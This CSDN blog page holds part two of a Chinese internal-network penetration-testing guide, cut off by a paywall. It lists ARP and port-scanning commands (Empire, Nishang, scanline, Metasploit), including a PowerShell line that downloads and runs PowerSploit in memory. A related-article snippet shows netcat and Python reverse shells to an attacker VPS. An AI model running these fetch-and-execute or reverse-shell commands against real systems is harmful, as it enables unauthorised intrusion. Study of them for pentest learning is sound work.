内网安全-渗透测试指南(二)

最新推荐文章于 2023-01-04 14:30:02 发布
最新推荐文章于 2023-01-04 14:30:02 发布
阅读量196 收藏
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62098017/article/details/120424386
版权
Empire 中的 arpscan 模块: usemodule situational_awareness/network/arpscan
Nishang 中的 Invoke-ARPScan.ps1 脚本
          powershell.exe -exec bypass -Command"& {Import-Module c:\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.1/24}" >> c:\log.txt
通过常规 TCP/UDP 端⼝扫描
     scanline ⼯具
                 scanline -h -t 20,80-89,110,389,445,3389,1099,7001,3306,1433,8080,1521 -u 53,161 -O c:\log.txt -p 192.168.1.1-254 /b
扫描域内端⼝
          利⽤ telnet 命令扫描
                  telnet DC 1433
s 扫描器
           s.exe tcp 192.168.1.1 192.168.1.254 445,1433,3389,7001 256 /Banner /save
Metasploit 端⼝扫描
           use auxiliary/scanner/portscan/tcp
PowerSploit Invoke-portscan.ps1 脚本
                powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/PowerShellMa
fia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Host 192.168.1.1/24 -T4 -ports '445,3389,1433,8080,7001' -oA
c:\log.txt"
      Nishang Invoke-PortScan 模块
                    Invoke-PortScan -StartAddress 192.168.1.1 -EndAddress 192.168.1.254 -ScanPort [ 探测存活 -ResolveHost]
收集域内基础信息
           查询域:
最低0.47元/天 解锁文章
肾透
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网安全-渗透测试指南(一)
qq_62098017的博客
09-21 271
⼀、内⽹渗透测试基础 Powershell 查看执⾏策略 Get-ExecutionPolicy 设置执⾏策略 Set-ExecutionPolicy [options] Restricted 脚本不能执⾏【默认设置】 RemoteSigned 本地脚本可以运⾏,远程脚本不能运⾏ AllSigned 受信任的签名脚本才能运⾏ Unrestricted 允...
内网安全-渗透测试指南(三)
qq_62098017的博客
09-26 192
反向Shell VPS上执⾏:nc -lvvp 9999 ⽬标主机上执⾏:[Linux] nc VPS_ip 9999 -e /bin/sh [Windows] nc VPS_IP 9999 -e c:\windows\system32\cmd.exe ⽬标主机没有NC时获取反向Shell Python python -c 'import socket,subprocess,os;s=socket....
内网安全检测小结
04-17 114
  最近一段时间,都在做内网服务器全网段的安全检测,也算积累了一些经验,在这边小结检测的流程和思路,也方便自己复习。   检测目的:尽可能的帮助客户发现服务器网段可能面临的威胁、存在的安全弱点   检测条件:一个接入点,可以访问一个或多个服务器网段。 一、信息收集 首先,对服务器资产信息进行收集,了解哪些ip是存活的,存活的ip开放了哪些端口,以及端口所对应的服务。 使用工具...
内网安全测试基础学习笔记
weixin_30692143的博客
06-11 141
0X01内网渗透测试 一般的步骤 0X02内网渗透的基础 内网概述 行政部的就加入行政组 技术组的 了解域 多个域的情况下面 转载于:https://www.cnblogs.com/-zhong/p/11006101.html...
内网安全检测技术yyds!你还不会吗?
weixin_43766412的博客
07-28 1661
内网安全检测技术yyds!你还不会吗?
内网安全攻防-渗透测试指南 读书笔记.pdf
09-09
内网安全攻防-渗透测试指南 读书笔记
内网安全攻防渗透测试实战指南.pptx
07-01
内网安全攻防渗透测试实战指南
内网安全攻防-渗透测试指南.rar
09-07
内网安全攻防-渗透测试指南
内网渗透测试-外链.pdf
05-04
内网渗透测试-外链.pdf
网络安全-渗透完整笔记
03-27
换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。渗透测试的目的是...
局域网安全的攻防测试与分析
05-07
局域网(Local Area Network),简称LAN,是指在某一区域内由多台计算机互联成 的计算机组。―某一区域‖指的是同一办公室、同一建筑物、同一公司和同一学校等,一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共享、(扫描仪共享(注:扫描仪不能共享))工作组内的日程安排、电子邮件和传真通信服务等功能。局域网是封闭型的,可以由办公室内的两台计算机组成,也可以由一个公司内的上千台计算机组成
Invoke-ARPScan.ps1
04-04
Invoke-ARPScan.ps1
内网渗透测试——内网渗透测试基础
李安北的博客
01-04 996
1.内网基础知识 1.域得划 再局域网将不同的计算机按照功能(或部门)分别列入不同的工作组。 加入创建工作组:点击桌面上的计算机图标,再弹出的快捷键菜单选择属性,然后几次点击更改设置和更改按钮。再计算机名输入框输入计算机的名称,再工作组输入框输入想要加入的工作组名称。 2.域 域:是一个有安全边界的计算机集合(安全是指在两个域,一个域的用户无法访问另一个域的资源) 域控制器(DC):是域的一台类似管理服务器的计算机。负责所有连入的计算机和用户的验证工作。 域控制器存在由这个域的账户,密码,属于
内网信息收集
weixin_45778886的博客
11-19 677
内网信息收集
内网信息收集学习笔记
weixin_45644323的博客
10-09 252
信息收集概述: 首先对当前网络环境进行判断: 1.对当前机器角色进行判断; 2.对当前机器所处网络环境的拓扑结构进行分析和判断; 3.对机器所处环境进行判断; 收集本机信息 查询网络配置信息:ipconfig -all 查询操作系统及软件信息: 操作系统及版本信息: systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 查看系统体系结构 : echo %proc
内网安全学习从入门到入狱-知识-内网信息探测与收集
god_Zeo的安全博客
03-14 864
内网安全学习从入门到入狱-知识-内网信息收集 内网信息收集-工作组和域内基本信息收集内网安全学习从入门到入狱-知识-内网信息收集0x01本机检查--先看看我是谁查询并开启远程连接服务0x02域内信息收集查询当前额权限判断是否有域查找域控获取域内的用户信息0x03 域内网存活主机的探测主机存活扫描域内端口扫描PowerSploit Invoke-Portscan.ps1 脚本 前提准备 本...
内网渗透基石篇--内网信息收集(上)
05-06 1092
前言: 渗透测试的本质是信息收集,我们可以将内网信息收集大致分为5个步骤,即本机信息收集、域内信息收集、登录凭证窃取、存活主机探测、内网端口扫描。 进入内网后,首先需要对当前网络环境进行判断: 我是谁:当前机器的角色 这是哪:当前机器所处网络环境的拓扑结构2 一.收集本机信息 (1) .手动收集信息 本机信息包括操作系统、权限、内网IP地址段、杀毒软件、端口、服务、补丁更新频率、网络连接、共享、会话等。 如果是域内主机,操作系统,应用软件,补丁、服务、杀毒软件一般都是批量安装的。 1.查询网
Domain Info Gather
prettyX的博客
01-06 486
1、判断是否有域 ipconfig /all nslookup domain_name systeminfo net config workstation net time /domain 通过net time /domain这条命令,依据命令回显结果,可以对当前用户做出区分: 1、在域内,是域用户 2、在域内,但不是域用户 3、不在域内 2、域内存活主机探测 利用netb...
内网渗透之信息收集
qq_48904485的博客
04-25 5811
内网信息收集 一、内网信息收集概述 渗透测试人员进人内网后,面对的是一片“黑暗森林”。所以,渗透测试人员首先需要对当前所处的网络环境进行判断。判断涉及如下三个方面。 我是谁?一对 当前机器角色的判断。 这是哪?一对 当前机器所处网络环境的拓扑结构进行分析和判断。 我在哪?一对 当前机器所处区域的判断。 对当前机器角色的判断,是指判断当前机器是普通Web服务器、开发测试服务器、公共服务器、文件服务器、代理服务器、DNS服务器还是存储服务器等。具体的判断过程,是根据机器的主机名、文件、网络连接等情况综合完成
内网安全攻防:渗透测试实战指南 pdf下载
最新发布
07-29
对于内网安全攻防和渗透测试实战指南的PDF下载,首先需要明确渗透测试的目的是为了评估和测试内网安全性,找出可能存在的漏洞和风险,并提供相应的防御建议和措施。 在下载PDF之前,我们应该明确以下几个问题: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值